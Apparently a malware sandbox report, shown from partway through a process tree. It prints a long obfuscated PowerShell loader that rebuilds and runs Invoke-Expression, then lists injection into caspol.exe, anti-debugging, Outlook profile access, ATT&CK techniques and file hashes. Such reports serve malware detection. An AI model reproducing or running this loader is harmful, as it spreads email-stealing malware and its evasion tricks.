gASkAAaA P6 IALa2 FD B3FoEAn8 BE E8 TECo7 CF S2MuF e3 AF P4 UE T7baEHuALoEQuFPlFNo5FuESk3UnBBa5 CAGuAPhA P6 OADe2NeC C7DaEMeD BF e3 TFDe6NoFKn3PrEFa8DkE GD LF I2 SF L4chE C3KaE l8PoFCu5UfAOuAAnApa6inALn2CoCsuE DESt3StESo7ExF B0 XE H3RaEsl2DdADoFHuAOb8MaDFa5UdE O3FoFam2CaC SFEmE UBAcF P6foEdaAFuEMa3 BEDeBSeEBe3PsE F8 BF U2ViE T7 OF G2 SECoFSaE M9FlE C8OvC h0vrE IASpE U7AuEFo1LiF H5AiACoE CA F2veC IDLaEKe9 TEasACeF A6UnESp9 DFNe4 MFPr2 rFko4diF S5NoB F1SpAHeF C' C;af&Hv( D`$ SUSvnUdn Sa StInuNorNoaUnllei UsPoe B7 K)El O`$ MZDeyStg AoGsd BaRocBet AyLilLae B4 B;vi`$PaZSuy vg To KdEnaFec CtCry BlBreSu5Re ve=Ty CoGLorFon Fs CeLet RiBel NfFjlDadMue StSe8 B M'UsF H4piE I3 UF F2 PFTi3 AFca4 UEBo8roA C6WiAMe2FlDWi4UnEEt3MaETi1 KESe8FoE S0FlFLi4LoE B7SlERaDGaE DD IE S3BlFCe5 BAGr8RvCmo5ceFSt4BlEVe3UnE D7 AF I2 FEBa3 ADjo2 NF DF PF O6BlE S3 VA TE AA UF L'Po; A&St(Ud`$EjU KnPlnRiaKutAlu ArMiaInlCiiQusReeSv7In)Ri M`$soZAsy Lg So Hd RaDvc WtHey Rl BeFo5Sk G Po U; C} K`$ OCUnrPra KnUdkineCar TyAf Ve= U DGUdr AnInsPle St Si flRuf UlCrdWaeratBr8Ma E' UE MDAmE R3RoFTr4HyE M8 OEVr3LeEApAbiB R5 PB p4 c'Ev;Tr`$ DoIlp Ss LlCaaFlgVes bt AaDovBal VeTjrTesAn Sh=No HyG vrWhnNos Ke AtSaiUnl ff Rl PdReeBet U8Pa Bu'DaF B3 GFHy5PaELo3SuFIn4ItBAr5geB E4 G' L; F`$PoA SfVap CoPelYei AtZai msUnw Pijur E0An3An Ho= S EgGWar Dn Ms VeAvtDei Cl pfCelSkdSae Ft S8 t S'StCBu1SaEKi3PrFBr2UnC S5DyESp9SsENa8PrFIn5 EESi9ArE VAImEPr3UdDAt1voEPiFKvE N8 PE L2IlETa9 UFFu1 S' T; A`$ SAKrfStp Ko El Bicht SiMes GwWaiFrrIn0 U0 U=PaGBrr InVrsRae Ft Si Ll NfThlRed le Mt U8Af A'DuDPa5 LEKaE SEUn9 SFAn1 tDOp1DuEreF MEBr8 hERe2 PENu9 PF T1Fu'Va;Sl`$poZ Iy HgIro udSoaFocCytChyGrl CeSe6Iv Kv=Ta HGAerPin bsakeAlt CiFilPof MlDedMie Pt s8st B'SaAYi2WaC U4 OESu7 PE D3 PE D2 ME B3FrE PD GE O3IlF C4PrFUn5 PA Z6SaB RBUnA F6MaD FD PDNe5 MFMaF OF H5NeF U2InEAn3KrESeBSwA V8FuDre4inF d3CiE b8 SFPe2PeEChFPrE SBOuEUn3PrA C8PrCScFUgE L8FoFam2 MEVo3 MFSh4BaERa9AfFLe6LiDKn5 SE H3SpFSi4psF M0 DE FF cEEf5frEBr3UnF C5beAFe8 OCFoBCoE S7 AFIn4 kFFe5UgEOmESsESk7 GE VABrD BB FBSoC GBCuCseCRe1 EEps3 KF A2 OC P2KrEPa3 pE AAArEPr3 aEPa1OpE u7BeF D2PuEJv3TeCSk0BhEKr9 VF O4VaC P0 bFVa3ReE S8SuEDo5PoF U2CyEPlF GE B9 PE A8FoDEj6 EEPo9GrEFoFcoE I8olF P2KoEro3BlFBe4PiAklE EANrEchEDe0 SEAdDtoF S6 CAPr6AfAAt2GeCUd5AsF I4StE S7BoE P8DiE MD PE A3MaF U4 TFTrFDeAAr6AcA D2ScD r3udEAf8 BEFo8 REUd7 TF O2NiFNo3VoFUn4EuESy7PeE eARhE sF DFBi5itEPl3OeBYa2 CA SFCoAKoA SA F6 AAGaEGlCRe1WoCBe2 SDRe2 NAPo6VrCmg6 FA pE dD FD RCreFDiE U8MiFSu2 BD f6PiFWh2 TF t4 PD OBPaAEfAJeASc6NoDNoDObDRe3 UC CFMaEAn8 VFSe2VaBen5ExBkv4TaDBrB MA IAanA H6NdDWoDStDHu3MaCNoFSpEbi8 UF S2SeBFo5 HBPr4chDFoBPrA MAPuARe6LyDPoDScDBr3OvCyeF GEou8 DF I2 HB R5smB S4 sD GBLeAShFMaA F6 AAKlE NDScDAsCPoFTuEAr8NoF s2UnDIr6GrF F2AcFBe4 SDAeBFdA SFFuA DFfiACoF M' u;Tt&Mt( P`$ TUPanRen MaHktlauRorMaaChl CiSusGae E7Ne) V Tn`$CiZ SyKag DoSndVuaBucphtDeyAnlMie B6At;Wa`$enASkfTup Lo SlUfiCrt TiDys Mw AiDirOr0An1 F Ak=Tr BeGJurFln vsGleSptdeiTalCrfRelSkd EeDrtDe8An L'PiA L2TrD B4 TE S3InECr0ReFAl4 MESe8 RF R5PbE I7EnELo8 sE b1ExEFu3 pFFa4 KEKa8SuE C3 RA b6HuB pBHuASt6PhDNaD PDWo5 FFKrF NFPr5 DFSi2SiEEp3GaE IBKoARa8liDEf4MeFSp3 LE E8 PF P2ByE KFScETjB SEAb3 SACh8HeCFoF PECr8 DF K2DaEId3AfF a4 TESk9 MF F6 SD S5SoEAn3 PFsa4PaFfr0 RETaFRaESu5VaESk3PrF S5scAVe8EtC CB IERe7OvFOv4OfF K5ShEduE IE N7YeEFoACaDNeBReBOvC uB ECSpCPa1FjELy3KrFBl2 FC R2 aE E3DoEFaA UESe3 RETo1saE u7 OFSt2PaEsn3 SC T0 AEKr9udFBi4 DCSa0 SF L3MeE c8BlEJu5PrF I2SuEBuFFiE K9SaE K8 tDSv6CaELe9HjE AFPrERe8 JF S2UnESl3TrFSy4CaA DETeAEfELoEHa0UnE OD HF F6FiAAs6jeA S2 KELi9CoF A6crF S5MeE GA GEBu7OpEDo1 DF F5 SFUo2DeELa7 NFRa0 SEPoADeE A3 nFRd4VaFBe5FrA T6 DADy2BuCCo7TaEBe0BlFKi6 WEDi9BeEBaAGoEAkFIsFHa2 CE AFeuFMa5 SFbr1 OE CF CFAd4 DBSp6 FBBo6UdA DF SAKaAPrAQu6 TABrE KC P1 KC F2 ND D2MiAIr6opCCh6ToASeE IDBoDAnC BFInEVi8 FF H2SuDTa6 KFpu2 SFSw4 DD mB SAmaA FALs6 RDDeD SD A3 RCumFNoEMa8 EFDi2seBWa5ScBSy4EgDOpBOrAdyF AAEp6KkA FE OD FDBiCClFNoEHa8baFet2MaDAr6 jF O2YdF S4 BD BB KA SF SAOiF KAFaFCe'An; A& R( C`$StUGonElnRyabotFluSrr Ua MlBriHvs BeSt7Re)Co Te`$ FA TfChpLso Tl BiDitSeivisomwOmiTorLe0 a1Th; p`$hyA Bf UpMeoGll Iifat Si FsDuwUni TrVi0 O2Di Qu= L nG VrSvn QsSve Ut Fi RlMafBrlAmdGae WtSt8 G El'MaA S2SaC S4BeEMi9RuF W4 LE A3KrEInBCyEIn3PuFUn5MeFBr2 RF S4 SERi3 PA Q6BaB FBKiA F6foDNyD CDNo5 tF NF SF P5MiF B2ThELe3 HE MBBeA A8ekDtr4 PFUb3ClE T8DoF R2SdEgoFOmETiB SEDo3SpAVe8HyCArFAnEIn8AgFTe2 GE T3 DF D4NoEWr9eaFNi6 UD T5 eEEn3 FF B4StF B0 DE HFFaEOc5 FERa3 MFAc5BrACy8ArCSeB BE C7 BFSt4PoFSp5 AEDrEPrE A7DdEPaAApD UB BB TCHaBtaCegC P1 LEDe3BrF R2AgCUn2 IE S3SaE BAUnEun3RoEUh1 MEBr7VaF T2InEPi3 SCCn0 TEBo9 SF G4FoC H0 BFKl3AcEmo8 SESl5 BFUn2DeE IFsuEOs9PhESp8 GD T6ShECi9TrESpFNyERe8SeF F2TeE s3LaF V4 DATeE DA PE CESo0HyE DD cF s6TrA H6 CA B2BrC U5UnFMo4UnEKe7 SE G8AnEBeD SESk3KoFud4ViF HFSsAAr6CeA L2 MCUn7FoEDi0 GFBi6agE H9 SE LASoEDeF AFDi2 pE bF UFPe5LeF T1 NE LFGyFKa4FlB P6OsB E5 PAGlFBeA DA PAac6 MAWiE SCEl1ShC A2BoDpl2KaA W6myCtr6 EAFlEGeD kD PCSaF PESl8FuFKy2 LDSc6 SFRe2 OFfo4 SD LB LA HF PACo6TiA SE tD UDnoC BFDeEOp8IdFCy2MeDEm6 mFSk2 TFOg4 JD TBneA TFAnAMeFPrAnoFMe' P; U& L( K`$JeUStn MnDeaNat mu DrKlaFil SiFlsEseGa7Al)Lo Wh`$ aAGrfEsp CoBulCoi CtEfi Ss AwReiEsrPa0St2Pl;Un`$ AZAny ug RoArd PaDec EtVey plFne R7Vi Fj= S JoGJurPen Ds NetvtByiBol Of SlDddSke PtAk8 B Ap'KvA A2SaCOb1EfF H4SuE RF GEVa8 MEKo2 TE A3 BF t4LaFOvFTtBOv7DeBPrFSkBUn0inABo6ShBReB CATr6 AADe2StC J4 AE N9 cF A4 UE W3GuEFeB LE K3FoF R5HeFCo2 MFMu4 EEKo3GoA i8NeC CFSkEAs8VrF S0grEFa9 BE IDcyE O3SyA SE OBKe6InARhF H'mi;Ly& G(Lu`$ReU Rn vn Fa TtBruSurSiaMalKni BsTae G7 S)pi Un`$ SZThyAlgIloDod SaToc Pt CyRel Pe S7Pa;Gr`$stZVayovgPuo Nd ca Mc VtPhy RlHoeKj7Ga S=Ga vaGBarConCisUdeSkt AiBolHvfGel fdFje RtKa8Sk S'AtAFi2DoDPu4UnEAg3 TE S0LlFGt4FlEps8FlF I5YaE L7BeETe8PrE R1KoE L3KoF z4LoEPr8 RE S3flA S8SaCPaFPrE P8 uFJu0ElECh9 SE iDReECh3 PA MEAnAsa2InCTw1CoF B4 NE AF HEDe8CoE O2ChE U3saFGo4 MFXeFGoBPe7 BBRhF RBPr0BeA SAMuAPa6UsBme6KlANoFRa'ge;Me& R(Be`$OvUlonMin Aa AtEkuObrDoa Sl PiPrsEre S7 A)ar St`$ KZNiyStgMbo BdGraFac At ByTilNee P7Do; E`$ BP FaBrtOkrBgu blPej Se Yt HjCae Sn SeFosCitLeeStr Ts P Gl=Co Unf Jk DpRe Pl`$ SUOun SnSeaSnt Du HrShaPrlChiClsVse E5Re Ov`$ BUfon OnIna St Su mrguaSol oiCysPleIn6 A; F`$TyZ ByIag Fo RdpraTycHotSkyrel PeSt7Vi g=Ad MaGGir SnRasAbe ktBii Ml bfSmlRod De StLs8Ss Sk'FiA T2ClCSp7PaFPh0 NEMiA TFOu5StEDiDviEEn3HiFre4CrB P5NoA T6 ABCiBShALn6 PApr2 ECEl4 OE A7 MESo3ClEVa2FeE L3 TEInDprECa3PoF T4BrF D5SlAun8 NCSaF AE A8reFSe0 LE B9abEacDBeESp3PaASiEHeD CDReCPrFseEBl8FoFSl2SpDPe6 MFOx2ciFto4GoDGnB SBDaCViB MC oDDrC AE k3 PF E4AsETr9KaAveABrAUn6UnBCo0 GB N2KoB T6 WASuAToAJa6 CB L6PrFilEPoBSo5boB M6 SB P6MaBPr6 fAAnANoAhu6DrBUn6DeFTaEFlB P2AeBBo6BoAdeFOp' S;St&Kl(Do`$UnUVrn Kn Ta LtCouAsrPaa MlHui es BeIn7Di)St La`$OpZLay BgDroUrdPea McEltkuy Ul CeCy7Ud; F`$MiZSpy SgUnoHad KaGocHot AyFol SeNo8le Z=Fe CGkirAin BsImenot Mi Olthf tlSvd TeEntNa8 S Kr' MA s2TrCUdD AESk9TjFOs4PlF H2PeFIn0 SE C7SuF A4 nEcaFXaEUn1BuAAr6 HBUdBLuAFo6AfA L2TrC A4 CERn7AnE P3StE R2 VE W3 gEUnD bEGe3RoFFo4CaFTo5asA N8 HCHeFUdEDe8MiFPl0ToE O9 DE RDChE F3 PAPoEAdD TDUnCClFJaEpu8 LF M2ThD K6AdF B2 rFSt4 HD SB ABOtCDeBFeC RD ACEgE F3ReFTa4 uE H9 LAMaASkA F6PlBAj0WhBBuFunBFnEScBVaFSkBUn2anBEx7 PB S2IlB R2 AA SACoASe6 ABEx6VaFBaEViB V5 MBRa6AnB A6 LBuh6 EAnoA oA R6 BBNa6ChF LE cBFl2HjAPeFpl' E;Kr& E(Re`$EfUSanNinAraEvt Cu KrFoaVel KifosRoeDr7 B)Mi Ur`$CoZ nySog Vo SdAla Rc Bt Fy hlUdeIn8Ni;My`$MuAEsvDilAdsWokBee FrAk2Ir=Su`"""Ro`$ deByn Kv D: HTUrEFlM PPIr\AlP ZrUno Rp Do slScifus GeGutKv\UvS GtCarCrs sk Ae tepan Ss H\ BOStcThtMaoTrpSuo Cd GaNy.BeSYayIne K`"""Ci; F`$GuZQuyArgHao KdKraPlc CtSoy slPae R9Sk pa=Li DiGOvrVanPesWheEntCoi SlTrf GlLrd GeOctpi8Re K'BeA F2GrD ACAuF HF BE F1GaEmi9 PETr2 NEOs7LeEFl5DiF D2InFRiF SEUnA SE o3 RA B6 GBReBSpACe6ElD HDUnDSl5NiF lF GFUn5FlF V2 LEDu3 SEtoB SA S8 dCPoFEsCDe9 UALu8 ACKl0 HE KFkaE FA LERu3 OD BB BBAlCFrBInCSaDId4UpE F3FaE A7 TEBa2PoC B7 FE KARaESkAcoCHu4IsFblFChF B2 HE S3 BFJo5 YAGaEDjAVe2UsCFl7BrF N0anE TA SFKa5 tE FD SE F3DrF F4HeBTi4TrA eFOr'Co;Sr&En( G`$SuULonUnn Ta St AuSlrDoa Sl MiResSieKa7Ka)Br An`$SkZ Oy RgPuoObdIna LchetSvyColSke F9 B;Sm`$KaG Mr Sn PsDeeBat Ri Kl UfPrl DdOceShtOp0 L Pi= D TeGFlr OnTisSteEvt Ti PlRyfFrl UdBleFotNi8Fo Be'SvDGoDSkDFi5MuFSaFDiFBa5RiF C2MiESt3 HEHyB RAMe8DaD b4 tFAt3 dESt8 CF B2 CE ZF EE HBUnEBr3SvAGi8 MC ZF ME K8DiFDa2 REPj3FuFUd4DrE U9GrF B6DiD C5 EECo3 KF M4hiF S0 EEunF RE I5AvERa3 sFBr5PrA H8 CCHaBTrEAk7 OFOy4AaF H5HeE FEKoE C7 MEMiA SDfaB PBPiCStB SCHjCbi5 KE F9SlFLe6 UF BF BAMiE SA t2 TDPrC SFToFlaEEp1AkECy9viE E2NoESe7 BEai5TaFDy2WeF HFMuEPrABrEhy3 KA GASpAUn6SvBPs5 SBSk6SyBNo4 FBPa2AkAInA DA R6 EASe6CoAPr2 TC D7 FFBo0HeE VA RFbr5 ME OD BEpl3EnF P4GuB m5DiAKeATyAGe6 MBCh0CoBFo2loBSg6puA MF M' A; r& H(Un`$SmU EnUnnHaaSutTau Er SaBol SiSesFle a7 R) M Re`$ IG Pr GnPrs De Ot Ei Albef JlGad KekrtDi0Ri;Bu`$DuC Ne YnSutUveRes Si Mm TiMn= K`$BaZSey pgsio Kd Ua ScFotFlyMolFoe P. IcSloflu cnmitBu- S6Sp4Op0Co-Un3Ju0Mi2Do4vd;In`$ LG KrutnHasNje UtLai Vllrf BlBad Sedat L1 M Be=Bl HrG Er An Ds uetetNei Kl cf DlSadRee Etdv8Ta P'ReD PDMaDUn5 SFFuF PFTi5 MF S2CoESt3 AE SBAlA S8 MDUl4 rF P3BoETo8 rF F2CoE AF BEPaB SEMi3 NAFa8taC HF UEbl8ViFMi2SnEsp3diFBe4 SE G9SmF B6EnDLa5SmE H3AnF K4PrFAr0AlEUnFovETa5 NE A3 VFSa5 TAHi8NiCArB BEFi7 SFMe4 IFUf5SuEScEBiEDu7ReENoAKoD OBDoB AC SBSuCGuC M5 AE S9KaF A6 PFChF SASnEreASp2 BDSkCHeF HF NESa1DeEWo9ErEFr2SeE H7InE T5 RF A2CoFDeFBaE LA CE Q3ReAUrA PA M6AnBSk0DeBCu2 JBAr6 SA SD AB T5ChB M6MoBHa4 uBFy2 UAKaA UASa6 SALa2 LCCeD KEIn9 SFGl4BlF B2HoFDe0 IE u7 GFSo4 REopFAdE B1WuASjA GATr6LoAAl2 UCFl5TaE P3BeEDd8 DFGo2 OE F3TvFSl5NaEHjFAuEFeBveE aFovAReFNs'hu;Sk&Op(Go`$GaULinGan Na Tt DuMarLoaReldei bsOve S7 G)Ha In`$ IG PrTen ksoreZutAmiArl SfSolInd CeTnt M1 P;Dd`$ImG FrMinResPseFrtBai Bl mf HltodSqe Bt T2Su Or=At SyG Fr UnUnsPse HtSpiLelCifAll pdSne St V8Re D'OvA b2ShC M7reFKr6orECe9UdFGa2HuEDiEBiEDi3 nE T5 LE M7 PFEt4 RE H5 AE d7InF A4BjE KF bEDe3opF f5PaAPr6StB SBClA e6 EDSlDStDEn5GrF AFKlF W5SpFsi2FoESk3 VE SBTiA B8 PDEv4 AF A3DaEKh8 HF g2KnEMyF BEcyBSmEIn3 UAEm8StC PF PEAd8AtFSt2 MEsk3niF T4 OESl9KeFKi6SuDDo5loEDi3AnFEb4UnFEn0SlE PF RE T5StECo3MoF D5UnANe8AvC aB MELi7TeFSp4HiFNe5 uEPeEkoEDa7PoEamAUdD ABNaB ACEfB KC UC A1XmEBu3 SFTv2 SCRa2taEDa3UdEAdA ME a3RiE D1TrE u7RoF V2OuEDi3 KCSv0EkEAp9 PFEc4 cCEf0ClFMe3unE T8SuELa5UnFun2 PESnF REWa9PeEAr8brD S6FeEBa9 GE SFUnE L8 BF A2imEPr3 KF A4StAInECoA AEFrESk0EiE GD TF F6uoA R6OvATi2crCiaE FE O9 RF L3TwE t2 CE L7DiE B8 AAOr6KaALe2 dD T5MoEMe8InFSi4UnE m3 BE p2afEUn3 AACaF SAreAOmA S6LiA DEPeC T1InC R2FiDId2ViA A6MaCUd6 TAAnEAnD GDGiC SFHeEPr8PaF R2StDGr6 IFRi2PaFOf4FoD UBSeABoAPeA T6MiDPrD RC BFOvECr8 TF L2 LD P6UdF R2 SFIn4RiD oBZiA SA SA B6SkDEkDtrCHjFAfE T8FiF S2 DDKd6 BFHe2PrF N4hvDThBShA MABaATu6 MDatDLiCTiFDuEAt8 AFSt2AlDKr6 AFMy2DyF A4ExDRaB BAarARiAFo6 kDUnDPiCKrFBrEFo8 PFBa2 PD C6RuFOo2 FFav4 MD HB SA SFIsA L6 OAIdETwDReDDaCHiFStESr8viF f2 LDOm6UdFKo2 MF M4SmDHuB uAGeFEnA EF LAdeFMi'Ka;in&Di( A`$ AUSunman la FttouEfrTrakil Wi QsSyePy7Be)Gr Bi`$ DG fr KnDisDieKatHeiFllCof SlKod Se At B2 A;Le`$ GGInr ZnBus ReFotSai bl Pf KlAcdExe FtMe3Ma No=de skGcir Mn ts SeAktLei IlAnfRel RdSpe WtAs8Ir P' cAWa2duC a7 FF C6BaEUn9 SFAc2 CE MEVaEUd3 JE F5 MEJe7UnFRo4meEbe5UnE M7 RFIn4glE OF LEAb3CaF F5XiABa8IlC KFRdE H8HoFFo0OzEFl9FoEHeDHuE S3 OAAuE WAFo2 LC M7SkF O0 CE DAOvF B5InEInDViEBi3 HF b4SuBDk5ToA FA oAUn2FrCBrDHeERe9SaFSa4HeFId2AlF R0 HEUd7 IF S4InE bFUdE K1ReA SAImA K2ChDGu6 PE e7 DF D2 IFBi4 RFLg3 nEAlAGaETrCNoERe3 FFLi2 PE ECLeECa3 AEkr8 RE F3 UFTi5XxF U2 FE P3 EF K4 PFAf5 RASyARaBUn6HiATrAStBTo6EnA VF R' H;Pr&Ny(Sk`$PrULfn CnLuaLitEnu irAnamalUniBasIneIn7Cl) F Ha`$ArGObr onImsPle Dt LiHelInf ulKod Se vt T3 M# V;""";;Function Grnsetilfldet9 { param([String]$Babyolatry); For($Skattelovens=2; $Skattelovens -lt $Babyolatry.Length-1; $Skattelovens+=(2+1)){ $Afpolitiswir = $Afpolitiswir + $Babyolatry.Substring($Skattelovens, 1); } $Afpolitiswir;}$Heresiologist0 = Grnsetilfldet9 ' BI TnCrv Bo Nk Febu- UEKaxMep Nr NeDesunsDuiGloOknIr ';$Heresiologist1= Grnsetilfldet9 $Profeminists;&$Heresiologist0 $Heresiologist1;<#Gator Publiceringen Elefantordnerne #>;"
3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1748

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
4⤵
PID:1052

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
4⤵
PID:788

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
4⤵
- Checks QEMU agent file
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:1456

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

1

T1102

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Cab2A2.tmp
Filesize
61KB

MD5
fc4666cbca561e864e7fdf883a9e6661

SHA1
2f8d6094c7a34bf12ea0bbf0d51ee9c5bb7939a5

SHA256
10f3deb6c452d749a7451b5d065f4c0449737e5ee8a44f4d15844b503141e65b

SHA512
c71f54b571e01f247f072be4bbebdf5d8410b67eb79a61e7e0d9853fe857ab9bd12f53e6af3394b935560178107291fc4be351b27deb388eba90ba949633d57d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Propoliset\Strskeens\Octopoda.Sye
Filesize
234KB

MD5
c2b34675c1b3705e3a3d0ea26242c938

SHA1
485fe6efe633145bf7d8eefc900e5c86510475be

SHA256
c2509451b2e11f9858e6ad8bbc5adb486b2763ba7f20587fd8016e9a67ac941d

SHA512
2d35469b6103e63d05e2aedb980c1a2d92b3a1fc6c8e7bb05e048f0d3aab86823fceab6db343344da62e5a2a9f49443e29fe7f4c86d8808af5d08732bc948b81

Download Submit
C:\Users\Admin\AppData\Local\Temp\Propoliset\Strskeens\Waferwoman\Frstegradsforbrndingen\Julesalaters.Dvs
Filesize
24KB

MD5
25673b7726a1a7fa08a2bd33c9b125c2

SHA1
a3d1169c77c7c527b34c2cc7b560ddfdef8abfca

SHA256
518b38d321dd396bd89d431c53f74b0d81cca2c3c00e39d0a7925425f1f1afca

SHA512
ceff81a4f77779dbc5d2c041f66f79678176183bd5a1d16eac342f97547e2b65ff3bf54f29c57875c13f0b65d0113694226f936548108cc083aeb3f3c146b70a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2BUXRY99Z2EIHR552FE5.temp
Filesize
7KB

MD5
5e43f3181ea4f3ec7a89e7877f93d137

SHA1
786e815d5b653483b4716ee6dc393fd8b78d5ec9

SHA256
2526718c19119fc2e614d918348957032bf39d2a0f1348085d08da1140552d37

SHA512
120b35ca16cba3d83260c60edb923aeb7ed6ba450728d8cb66d5a3fd95e3684e7b96c91b16f2de7dcb7fa713e4e91b589e0098ee7b199ecd1f0fb3c8f018808c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
5e43f3181ea4f3ec7a89e7877f93d137

SHA1
786e815d5b653483b4716ee6dc393fd8b78d5ec9

SHA256
2526718c19119fc2e614d918348957032bf39d2a0f1348085d08da1140552d37

SHA512
120b35ca16cba3d83260c60edb923aeb7ed6ba450728d8cb66d5a3fd95e3684e7b96c91b16f2de7dcb7fa713e4e91b589e0098ee7b199ecd1f0fb3c8f018808c

Download Submit
memory/1456-99-0x0000000000400000-0x0000000000430000-memory.dmp

Filesize
192KB

Download
memory/1456-75-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/1456-97-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/1456-98-0x0000000001360000-0x0000000005608000-memory.dmp

Filesize
66.7MB

Download
memory/1456-100-0x00000000216D0000-0x0000000021710000-memory.dmp

Filesize
256KB

Download
memory/1456-128-0x00000000216D0000-0x0000000021710000-memory.dmp

Filesize
256KB

Download
memory/1500-72-0x0000000002610000-0x0000000002650000-memory.dmp

Filesize
256KB

Download
memory/1500-62-0x0000000002610000-0x0000000002650000-memory.dmp

Filesize
256KB

Download
memory/1500-61-0x0000000002610000-0x0000000002650000-memory.dmp

Filesize
256KB

Download
memory/1748-71-0x0000000005040000-0x0000000005041000-memory.dmp

Filesize
4KB

Download
memory/1748-70-0x0000000005C00000-0x0000000009EA8000-memory.dmp

Filesize
66.7MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads